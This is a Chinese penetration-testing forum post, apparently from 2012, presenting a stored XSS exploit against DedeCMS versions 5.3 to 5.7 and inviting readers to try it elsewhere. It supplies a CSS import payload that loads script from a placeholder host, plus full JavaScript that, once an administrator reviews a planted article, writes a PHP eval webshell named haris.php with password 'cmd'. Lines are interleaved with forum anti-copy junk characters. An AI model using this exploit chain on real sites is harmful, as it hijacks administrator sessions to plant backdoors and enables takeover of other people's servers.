中国网络渗透测试联盟

标题: dedecms xss oday通杀所有版本 可getshell [打印本页]

作者: admin    时间: 2012-9-15 13:56
标题: dedecms xss oday通杀所有版本 可getshell
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
) m( P1 Q; f" l3 z% Y为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)+ M4 C8 R, i2 L% s, b9 F, z' ^
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
% I- K8 U7 o, K下面说说利用方法。
2 Y1 C# y* U8 e" Z+ P- G9 k3 j条件有2个:
# Q- C- d9 Y) n' h1.开启注册
1 l5 _) X8 ]0 |2.开启投稿
; T3 K# ^, Y0 N. s5 A% B注册会员----发表文章
0 G7 n) W/ F5 R" p" M: m- n内容填写:9 m1 H& z2 s  C' J
复制代码
- g+ R/ A# p% {/ b1 E! N<style>@im\port'\http://xxx.com/xss.css';</style>
/ L: G: D) v8 ?6 i+ v新建XSS.Css
! V  c0 r4 n0 L9 O复制代码
3 E7 K/ C8 Z* h$ o; }" D.body{* k8 Y% H% v8 y. x, E
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
" f( b( ^( E# @0 f4 ~* s3 d新建xss.js 内容为
7 y/ W0 X! a: u复制代码
7 v3 W- p" |% l# E* Q. A2 y1.var request = false;
. }: R; c' F( }2.if(window.XMLHttpRequest) {
- X" I' ?& p3 Y3 x3.request = new XMLHttpRequest();& |6 u; h5 r- r: [' L
4.if(request.overrideMimeType) {3 p5 N8 E! P9 m) m2 J, d
5.request.overrideMimeType('text/xml');
& ?  S4 Z5 s0 X' R2 B6.}/ c- p4 A+ \. a1 Q- B
7.} else if(window.ActiveXObject) {
0 D& Y0 m2 i- ], p, @* Z4 |- W8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];' k% ~! G( i; U. |9 b# k
9.for(var i=0; i<versions.length; i++) {2 C. A( `# J+ K% W
10.try {0 Q; B7 [7 Z# D" s6 B: ?+ E' ?
11.request = new ActiveXObject(versions);/ _4 {# U$ e+ p- K% N0 X& H
12.} catch(e) {}+ m3 @' j1 P/ t4 p& ?) f8 B
13.}
0 [4 F. i/ J* {% \( V2 h' a4 x14.}" q& c+ i" I6 P. F0 U
15.xmlhttp=request;2 u* Y" ?+ E7 y
16.function getFolder( url ){
8 [! }7 S9 s* z! X# ^- f17. obj = url.split('/')
! I9 {9 q) R6 n& ^8 j18. return obj[obj.length-2]
4 v: ?! B' [& T5 O! F19.}
& ?& M. l; {8 t7 t6 f# d: s20.oUrl = top.location.href;
" n" _, u- `# b+ i2 }1 D21.u = getFolder(oUrl);2 m7 I0 n' n' {
22.add_admin();
( P( ]- a2 w  m+ d23.function add_admin(){4 o/ k7 }! @/ W6 X. I" P6 C
24.var url= "/"+u+"/sys_sql_query.php";
1 f' M0 ^' r& ]3 o. F) n! b% f25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";, H2 }7 N2 p% d/ B% D" h9 J3 w
26.xmlhttp.open("POST", url, true);
+ H% I4 a/ X/ i1 T6 D2 y7 z27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
7 d, q) j5 C4 E  ^28.xmlhttp.setRequestHeader("Content-length", params.length);
( {8 I' M# b' G29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");# q$ n! @, d: m4 J) V9 o0 S+ }; a
30.xmlhttp.send(params);
2 a* X" Q3 P+ k2 r7 v5 ~, d31.}
  ?* [5 N1 c5 ^' L3 `( _/ E当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2